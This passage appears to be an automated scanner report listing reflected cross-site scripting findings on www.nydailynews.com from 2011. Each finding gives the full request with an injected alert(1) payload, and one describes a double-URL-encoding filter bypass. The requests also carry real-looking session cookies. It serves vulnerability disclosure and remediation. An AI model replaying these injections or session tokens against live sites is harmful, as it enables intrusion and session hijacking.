Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3affa'%3balert(1)//48573eb6d95 was submitted in the REST URL parameter 1. This input was echoed as 3affa';alert(1)//48573eb6d95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local3affa'%3balert(1)//48573eb6d95/education/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:32 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70091
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63dd8'%3balert(1)//d89f8c6c948 was submitted in the REST URL parameter 1. This input was echoed as 63dd8';alert(1)//d89f8c6c948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local63dd8'%3balert(1)//d89f8c6c948/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:41 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70081
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75deb'%3balert(1)//35f115dcb88 was submitted in the REST URL parameter 2. This input was echoed as 75deb';alert(1)//35f115dcb88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/index.html75deb'%3balert(1)//35f115dcb88 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:59 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70081
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76013'%3balert(1)//963b05456c4 was submitted in the REST URL parameter 1. This input was echoed as 76013';alert(1)//963b05456c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local76013'%3balert(1)//963b05456c4/queens/2011/02/08/2011-02-08_astoria_native_is_hoping_to_unmask_his_talent_on_syfy_competition_for_special_ef.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:32 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70185
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 568cb'%3balert(1)//38a234f39b7 was submitted in the REST URL parameter 1. This input was echoed as 568cb';alert(1)//38a234f39b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local568cb'%3balert(1)//38a234f39b7/queens/2011/02/08/2011-02-08_cycle_maker_working_to_share_his_bikes_with_city.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:37 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70153
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e916'%3balert(1)//c0620f7d053 was submitted in the REST URL parameter 1. This input was echoed as 8e916';alert(1)//c0620f7d053 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local8e916'%3balert(1)//c0620f7d053/queens/2011/02/08/2011-02-08_its_the_write_borough_site_to_launch_literary_salon.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:21 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70156
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4b98'%3balert(1)//dd4f889ca6b was submitted in the REST URL parameter 1. This input was echoed as b4b98';alert(1)//dd4f889ca6b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localb4b98'%3balert(1)//dd4f889ca6b/queens/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70088
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6785f'%3balert(1)//b8386426bc4 was submitted in the REST URL parameter 1. This input was echoed as 6785f';alert(1)//b8386426bc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local6785f'%3balert(1)//b8386426bc4/queens/photo_galleries/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:41:23 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 41784
Age: 0
Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload f8692%250aalert%25281%2529%252f%252fc683395795c was submitted in the REST URL parameter 1. This input was echoed as f8692 alert(1)//c683395795c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_localf8692%250aalert%25281%2529%252f%252fc683395795c/queens/photo_galleries/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:41:24 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 41699
Age: 0
Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27239'%3balert(1)//db4ca19e8d was submitted in the REST URL parameter 1. This input was echoed as 27239';alert(1)//db4ca19e8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local27239'%3balert(1)//db4ca19e8d/traffic/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70088
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a1d6'%3balert(1)//99850f0974e was submitted in the REST URL parameter 2. This input was echoed as 6a1d6';alert(1)//99850f0974e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/traffic6a1d6'%3balert(1)//99850f0974e/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1c5f'%3balert(1)//eb94d58337f was submitted in the REST URL parameter 3. This input was echoed as d1c5f';alert(1)//eb94d58337f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/traffic/index.htmld1c5f'%3balert(1)//eb94d58337f HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:55 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1e7b'%3balert(1)//494aa4c9757 was submitted in the REST URL parameter 1. This input was echoed as c1e7b';alert(1)//494aa4c9757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localc1e7b'%3balert(1)//494aa4c9757/weather/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;

Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70089
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cacad'%3balert(1)//be6d0d5648b was submitted in the REST URL parameter 2. This input was echoed as cacad';alert(1)//be6d0d5648b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/weathercacad'%3balert(1)//be6d0d5648b/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
